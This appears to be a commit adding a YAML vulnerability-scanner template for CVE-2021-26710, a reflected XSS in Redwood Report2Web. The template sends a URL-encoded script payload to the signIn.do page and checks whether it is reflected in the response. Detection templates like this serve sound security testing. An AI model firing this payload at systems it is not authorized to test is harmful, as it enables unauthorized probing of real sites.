Added CVE-2021-26710 (#822)

* Created CVE-2021-26710 🔥
patch-1
PikPikcU 2021-02-09 12:58:32 +00:00 committed by GitHub
parent 380b4e68f5
commit e1768ccede
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 29 additions and 0 deletions

View File

@ -0,0 +1,29 @@
id: CVE-2021-26710
info:
name: Redwood v4.3.4.5-v4.5.3 XSS
author: pikpikcu
severity: medium
reference: https://vict0ni.me/report2web-xss-frame-injection.html
tags: cve,cve2021,Redwood,xss
requests:
- method: GET
path:
- "{{BaseURL}}/r2w/signIn.do?urll=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "><script>alert(document.domain)</script>"
part: body
- type: word
words:
- "text/html"
part: header